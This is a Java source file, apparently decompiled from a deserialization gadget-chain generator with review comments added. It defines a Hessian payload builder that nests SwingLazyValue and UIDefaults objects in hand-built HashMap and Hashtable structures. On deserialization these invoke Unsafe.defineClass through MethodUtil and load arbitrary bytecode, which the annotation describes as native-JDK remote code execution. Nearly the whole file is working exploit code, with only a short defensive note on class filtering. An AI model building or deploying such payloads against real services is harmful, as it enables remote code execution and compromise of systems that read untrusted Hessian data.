package com.ar3h.chains.gadget.impl.hessian.jdk;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.util.Reflections;
import com.vaadin.shared.JsonConstants;
import java.lang.reflect.Array;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.security.ProtectionDomain;
import java.util.HashMap;
import java.util.Hashtable;
import javax.swing.UIDefaults;
import sun.misc.Unsafe;
import sun.reflect.misc.MethodUtil;
import sun.swing.SwingLazyValue;

/**
 * Payload builder from a deserialization gadget-chain generator. It is tagged
 * {@code Tag.HessianDeserialize}, and the object graph it returns is built from JDK types.
 *
 * <p>English rendering of the annotation text below (the strings are runtime metadata and
 * are left untouched): name "MethodUtil JDK native chain"; description "this chain uses
 * sun.reflect.misc.MethodUtil to call Unsafe's defineAnonymousClass method to load arbitrary
 * bytecode, giving RCE with the JDK alone, but the JDK may crash, so use with caution in
 * practice".
 *
 * <p>NOTE(review): the description names {@code defineAnonymousClass}, while
 * {@code getObject} looks up {@code Unsafe.defineClass}; the metadata and the code disagree.
 *
 * <p>Defensive reading: the returned graph consists of {@code java.util.HashMap},
 * {@code java.util.Hashtable}, {@code javax.swing.UIDefaults} and
 * {@code sun.swing.SwingLazyValue}, and carries {@code java.lang.reflect.Method} objects for
 * {@code sun.reflect.misc.MethodUtil} and {@code sun.misc.Unsafe}. A Hessian endpoint that
 * reads untrusted bytes should apply a class filter (preferably an allow-list) that rejects
 * the Swing and {@code sun.*} types, and the appearance of those class names in an inbound
 * stream is a useful detection signal. The declared precondition is "jdk < 11".
 */
@GadgetAnnotation(name = "MethodUtil JDK原生链", description = "本链利用 sun.reflect.misc.MethodUtil 通过调用 Unsafe的defineAnonymousClass 方法加载任意字节码，实现原生JDK RCE，但是JDK可能会崩，实战慎用", dependencies = {"jdk < 11"}, priority = 40)
@GadgetTags(tags = {Tag.HessianDeserialize}, nextTags = {Tag.BytecodeConvertTag})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/hessian/jdk/SwingLazyValueMethodUtil.class */
public class SwingLazyValueMethodUtil implements Gadget {
    /**
     * Builds the four-entry map returned by {@link #serObj} for this chain.
     *
     * @param str class name; used as the first argument of the staged {@code Unsafe.defineClass}
     *     call and as the class name of the second {@code SwingLazyValue}
     * @param bArr class bytes; staged with offset 0 and length {@code bArr.length}
     *     (dereferenced without a null check, so {@code null} fails here)
     * @return the hand-assembled {@code HashMap} produced by {@link #serObj}
     * @throws Exception on any reflection failure, e.g. when a looked-up JDK internal is absent
     */
    public Object getObject(String str, byte[] bArr) throws Exception {
        // Public MethodUtil.invoke(Method, Object, Object[]); held as a plain Object so it can
        // be placed in the argument array below.
        Object method = MethodUtil.class.getMethod("invoke", Method.class, Object.class, Object[].class);
        // Non-public lookup of Unsafe.defineClass(String, byte[], int, int, ClassLoader, ProtectionDomain).
        Method declaredMethod = Unsafe.class.getDeclaredMethod("defineClass", String.class, byte[].class, Integer.TYPE, Integer.TYPE, ClassLoader.class, ProtectionDomain.class);
        declaredMethod.setAccessible(true);
        // The Unsafe singleton is read from its private static field.
        Field declaredField = Unsafe.class.getDeclaredField("theUnsafe");
        declaredField.setAccessible(true);
        // Stage 1 ("abc"): a lazy value naming MethodUtil.invoke, whose arguments nest a second
        // invoke of defineClass on the Unsafe instance with (str, bArr, 0, bArr.length) and null
        // for both the ClassLoader and the ProtectionDomain parameters.
        Object[] objArr = {"abc", new SwingLazyValue("sun.reflect.misc.MethodUtil", "invoke", new Object[]{method, new Object(), new Object[]{declaredMethod, declaredField.get(null), new Object[]{str, bArr, 0, Integer.valueOf(bArr.length), null, null}}})};
        // Stage 2 ("ccc"): a lazy value naming class str with a null method name and no arguments.
        // NOTE(review): presumably a null method name means "call the no-arg constructor" - confirm
        // against the SwingLazyValue source for the target JDK.
        Object[] objArr2 = {"ccc", new SwingLazyValue(str, (String) null, new Object[0])};
        // Each stage is wrapped in two separate UIDefaults instances with identical content.
        UIDefaults uIDefaults = new UIDefaults(objArr);
        UIDefaults uIDefaults2 = new UIDefaults(objArr);
        UIDefaults uIDefaults3 = new UIDefaults(objArr2);
        UIDefaults uIDefaults4 = new UIDefaults(objArr2);
        Hashtable hashtable = new Hashtable();
        Hashtable hashtable2 = new Hashtable();
        Hashtable hashtable3 = new Hashtable();
        Hashtable hashtable4 = new Hashtable();
        // The stage-1 tables share key "a"; the stage-2 tables share JsonConstants.VTYPE_BOOLEAN.
        // NOTE(review): the Vaadin constant is probably a decompiler substitution for a short
        // string literal in the original source - confirm before treating Vaadin as a dependency.
        hashtable.put("a", uIDefaults);
        hashtable2.put("a", uIDefaults2);
        hashtable3.put(JsonConstants.VTYPE_BOOLEAN, uIDefaults3);
        hashtable4.put(JsonConstants.VTYPE_BOOLEAN, uIDefaults4);
        // Order matters: both stage-1 tables come before both stage-2 tables.
        return serObj(hashtable, hashtable2, hashtable3, hashtable4);
    }

    /**
     * Framework entry point: reads the class name stored under {@code ContextTag.CLASS_NAME_KEY}
     * and casts the result of {@code gadgetChain.doCreate} to {@code byte[]}, then delegates to
     * {@link #getObject}.
     *
     * <p>NOTE(review): {@code nextTags = Tag.BytecodeConvertTag} suggests the next chain element
     * supplies class bytes; the cast fails with {@code ClassCastException} otherwise.
     */
    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject(gadgetContext.getString(ContextTag.CLASS_NAME_KEY), (byte[]) gadgetChain.doCreate(gadgetContext));
    }

    /**
     * Assembles a {@code HashMap} by writing its private {@code size} and {@code table} fields
     * instead of calling {@code put}. Each of the four arguments becomes one table slot whose
     * node has hash 0, the argument as both key and value, and no successor.
     *
     * <p>NOTE(review): bypassing {@code put} presumably keeps {@code hashCode}/{@code equals}
     * from running on the arguments while the map is being built - confirm.
     *
     * @return the map with four pre-populated slots, in argument order
     * @throws Exception if the node class, its constructor or the private fields cannot be reached
     */
    static HashMap<Object, Object> serObj(Object obj, Object obj2, Object obj3, Object obj4) throws Exception {
        Class<?> cls;
        HashMap<Object, Object> hashMap = new HashMap<>();
        // Reflections.setFieldValue is a project helper; presumably a reflective private-field write.
        Reflections.setFieldValue(hashMap, "size", 4);
        // The node class is HashMap$Node where it exists, with HashMap$Entry as the fallback name.
        try {
            cls = Class.forName("java.util.HashMap$Node");
        } catch (ClassNotFoundException e) {
            cls = Class.forName("java.util.HashMap$Entry");
        }
        // Constructor shape: (int hash, Object key, Object value, <node> next).
        Constructor<?> declaredConstructor = cls.getDeclaredConstructor(Integer.TYPE, Object.class, Object.class, cls);
        declaredConstructor.setAccessible(true);
        Object newInstance = Array.newInstance(cls, 4);
        Array.set(newInstance, 0, declaredConstructor.newInstance(0, obj, obj, null));
        Array.set(newInstance, 1, declaredConstructor.newInstance(0, obj2, obj2, null));
        Array.set(newInstance, 2, declaredConstructor.newInstance(0, obj3, obj3, null));
        Array.set(newInstance, 3, declaredConstructor.newInstance(0, obj4, obj4, null));
        Reflections.setFieldValue(hashMap, "table", newInstance);
        return hashMap;
    }
}
